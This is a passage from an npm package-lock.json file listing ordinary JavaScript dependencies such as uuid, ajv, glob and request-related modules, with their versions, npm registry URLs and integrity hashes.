"dependencies": { "psl": "^1.1.28", "punycode": "^2.1.1" }, "engines": { "node": ">=0.8" } }, "node_modules/tunnel-agent": { "version": "0.6.0", "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", "dependencies": { "safe-buffer": "^5.0.1" }, "engines": { "node": "*" } }, "node_modules/tweetnacl": { "version": "0.14.5", "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" }, "node_modules/typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==" }, "node_modules/uri-js": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", "dependencies": { "punycode": "^2.1.0" } }, "node_modules/util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, "node_modules/uuid": { "version": "3.4.0", "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. 
See https://v8.dev/blog/math-random for details.", "bin": { "uuid": "bin/uuid" } }, "node_modules/validate-npm-package-license": { "version": "3.0.4", "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", "dependencies": { "spdx-correct": "^3.0.0", "spdx-expression-parse": "^3.0.0" } }, "node_modules/verror": { "version": "1.10.0", "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", "engines": [ "node >=0.6.0" ], "dependencies": { "assert-plus": "^1.0.0", "core-util-is": "1.0.2", "extsprintf": "^1.2.0" } }, "node_modules/verror/node_modules/core-util-is": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" }, "node_modules/wide-align": { "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", "optional": true, "dependencies": { "string-width": "^1.0.2 || 2 || 3 || 4" } }, "node_modules/wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" } }, "dependencies": { "ajv": { "version": "6.12.6", "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", "requires": { "fast-deep-equal": "^3.1.1", "fast-json-stable-stringify": "^2.0.0", "json-schema-traverse": "^0.4.1", "uri-js": "^4.2.2" } }, 
"ansi-regex": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", "optional": true }, "aproba": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", "optional": true }, "are-we-there-yet": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-4.0.2.tgz", "integrity": "sha512-ncSWAawFhKMJDTdoAeOV+jyW1VCMj5QIAwULIBV0SSR7B/RLPPEQiknKcg/RIIZlUQrxELpsxMiTUoAQ4sIUyg==", "optional": true }, "asn1": { "version": "0.2.6", "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", "requires": { "safer-buffer": "~2.1.0" } }, "assert-plus": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==" }, "asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" }, "aws-sign2": { "version": "0.7.0", "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==" }, "aws4": { "version": "1.12.0", "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" }, "balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", 
"integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" }, "bcrypt-pbkdf": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", "requires": { "tweetnacl": "^0.14.3" } }, "brace-expansion": { "version": "1.1.11", "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", "requires": { "balanced-match": "^1.0.0", "concat-map": "0.0.1" } }, "caseless": { "version": "0.12.0", "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" }, "chownr": { "version": "0.0.2", "resolved": "https://registry.npmjs.org/chownr/-/chownr-0.0.2.tgz", "integrity": "sha512-4sa7ZJ+/DavveVRsu49tUbYvLn5cS75w8gLQr14jXlFxSNbuoY7G6gPjcVfgdQ+c4BW02b0hXV5nOXYFD7Fmpw==" }, "color-support": { "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", "optional": true }, "combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "requires": { "delayed-stream": "~1.0.0" } }, "concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" }, "concat-stream": { "version": "1.5.0", "resolved": 
"https://registry.npmjs.org/concat-stream/-/concat-stream-1.5.0.tgz", "integrity": "sha512-litEocitzYgqQ0IPaoLw+tCHcVcJJYW05+SAhH+LS9qutSC7iuejvawts3cUYQycZbRbLsjG8mCJLQi2KX5kEw==", "requires": { "inherits": "~2.0.1", "readable-stream": "~2.0.0", "typedarray": "~0.0.5" } }, "console-control-strings": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", "optional": true }, "core-util-is": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==" }, "dashdash": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", "requires": { "assert-plus": "^1.0.0" } }, "delayed-stream": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==" }, "ecc-jsbn": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", "requires": { "jsbn": "~0.1.0", "safer-buffer": "^2.1.0" } }, "emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", "optional": true }, "extend": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", "integrity": 
"sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" }, "extsprintf": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==" }, "fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, "fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" }, "forever-agent": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==" }, "form-data": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", "requires": { "asynckit": "^0.4.0", "combined-stream": "^1.0.6", "mime-types": "^2.1.12" } }, "fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" }, "function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==" }, "gauge": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/gauge/-/gauge-5.0.1.tgz", "integrity": 
"sha512-CmykPMJGuNan/3S4kZOpvvPYSNqSHANiWnh9XcMU2pSjtBfF0XzZ2p1bFAxTbnFxyBuPxQYHhzwaoOmUdqzvxQ==", "optional": true, "requires": { "aproba": "^1.0.3 || ^2.0.0", "color-support": "^1.1.3", "console-control-strings": "^1.1.0", "has-unicode": "^2.0.1", "signal-exit": "^4.0.1", "string-width": "^4.2.3", "strip-ansi": "^6.0.1", "wide-align": "^1.1.5" } }, "getpass": { "version": "0.1.7", "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", "requires": { "assert-plus": "^1.0.0" } }, "glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", "requires": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", "inherits": "2", "minimatch": "^3.1.1", "once": "^1.3.0", "path-is-absolute": "^1.0.0" } }, "graceful-fs": { "version": "3.0.12", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-3.0.12.tgz", "integrity": "sha512-J55gaCS4iTTJfTXIxSVw3EMQckcqkpdRv3IR7gu6sq0+tbC363Zx6KH/SEwXASK9JRbhyZmVjJEVJIOxYsB3Qg==", "requires": { "natives": "^1.1.3" } }, "har-schema": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==" }, "har-validator": { "version": "5.1.5", "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", "requires": { "ajv": "^6.12.3", "har-schema": "^2.0.0" } }, "has-unicode": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", "integrity": "sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", "optional": 
true }, "hasown": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.1.tgz", "integrity": "sha512-1/th4MHjnwncwXsIW6QMzlvYL9kG5e/CpVvLRZe4XPa8TOUNbCELqmvhDmnkNsAjwaG4+I8gJJL0JBvTTLO9qA==", "requires": { "function-bind": "^1.1.2" } }, "hosted-git-info": { "version": "2.1.4", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.1.4.tgz", "integrity": "sha512-4R9eDu2ytsDMdo7nQXHrpK1347y3nu/ThXZ4tjpkUTsZnzoIIQprnPOM65c20oInjmocLuEGBIbPsesYCqibag==" }, "http-signature": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", "requires": { "assert-plus": "^1.0.0", "jsprim": "^1.2.2", "sshpk": "^1.7.0" } }, "inflight": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", "requires": { "once": "^1.3.0", "wrappy": "1" } }, "inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, "is-core-module": { "version": "2.13.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", "requires": { "hasown": "^2.0.0" } }, "is-fullwidth-code-point": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", "optional": true }, "is-typedarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", 
"integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" }, "isarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" }, "isstream": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" }, "jsbn": { "version": "0.1.1", "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" }, "json-schema": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "json-schema-traverse": { "version": "0.4.1", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" }, "json-stringify-safe": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" }, "jsprim": { "version": "1.4.2", "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "requires": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", "json-schema": "0.4.0", "verror": "1.10.0" } }, "mime-db": { "version": "1.52.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": 
"sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==" }, "mime-types": { "version": "2.1.35", "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "requires": { "mime-db": "1.52.0" } }, "minimatch": { "version": "3.1.2", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", "requires": { "brace-expansion": "^1.1.7" } }, "minimist": { "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==" }, "mkdirp": { "version": "0.5.6", "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", "requires": { "minimist": "^1.2.6" } }, "natives": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/natives/-/natives-1.1.6.tgz", "integrity": "sha512-6+TDFewD4yxY14ptjKaS63GVdtKiES1pTPyxn9Jb0rBqPMZ7VcCiooEhPNsr+mqHtMGxa/5c/HhcC4uPEUw/nA==" }, "normalize-package-data": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", "integrity": "sha512-/5CMN3T0R4XTj4DcGaexo+roZSdSFW/0AOOTROrjxzCG1wrWXEsGbRKevjlIL+ZDE4sZlJr5ED4YW0yqmkK+eA==", "requires": { "hosted-git-info": "^2.1.4", "resolve": "^1.10.0", "semver": "2 || 3 || 4 || 5", "validate-npm-package-license": "^3.0.1" } }, "npm-package-arg": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/npm-package-arg/-/npm-package-arg-3.1.1.tgz", "integrity": "sha512-jOIv9ddxThaiiI6WH2kLOsUL0vpA1rb7laRZO45OxSzGAj1ouiW0uQLq4zK2LR82pjeBO64VmEHHgUXHkyCQRw==", "requires": { "hosted-git-info": 
"^1.5.3", "semver": "4" }, "dependencies": { "hosted-git-info": { "version": "1.6.0", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-1.6.0.tgz", "integrity": "sha512-hX2w5jrEx2C64DRfLMb5OKHrZ8ReEkssfcjmrSHVih7dH1FD/qVn3/DfqLRQme2/CXBgpN/iApgAhpdaY+rCRQ==" } } }, "npm-registry-client": { "version": "6.2.0", "resolved": "https://registry.npmjs.org/npm-registry-client/-/npm-registry-client-6.2.0.tgz", "integrity": "sha512-zFrsY9IAR3prA7lwKBWZXi/SdxPBbAQXFqQsbgGZXzECUda/8jVW2x3EfD+2h70o/PGio4K6rYvC/A/IoT1IOA==", "requires": { "chownr": "0", "concat-stream": "^1.4.6", "graceful-fs": "^3.0.0", "mkdirp": "^0.5.0", "normalize-package-data": "~1.0.1 || ^2.0.0", "npm-package-arg": "^3.0.0", "npmlog": "", "once": "^1.3.0", "request": "^2.47.0", "retry": "^0.6.1", "rimraf": "2", "semver": "2 >=2.2.1 || 3.x || 4", "slide": "^1.1.3" } }, "npmlog": { "version": "7.0.1", "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-7.0.1.tgz", "integrity": "sha512-uJ0YFk/mCQpLBt+bxN88AKd+gyqZvZDbtiNxk6Waqcj2aPRyfVx8ITawkyQynxUagInjdYT1+qj4NfA5KJJUxg==", "optional": true, "requires": { "are-we-there-yet": "^4.0.0", "console-control-strings": "^1.1.0", "gauge": "^5.0.0", "set-blocking": "^2.0.0" } }, "oauth-sign": { "version": "0.9.0", "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==" }, "once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", "requires": { "wrappy": "1" } }, "path-is-absolute": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==" }, "path-parse": { "version": "1.0.7", "resolved": 
"https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" }, "performance-now": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" }, "process-nextick-args": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" }, "psl": { "version": "1.9.0", "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" }, "punycode": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==" }, "qs": { "version": "6.5.3", "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==" }, "readable-stream": { "version": "2.3.8", "resolved": 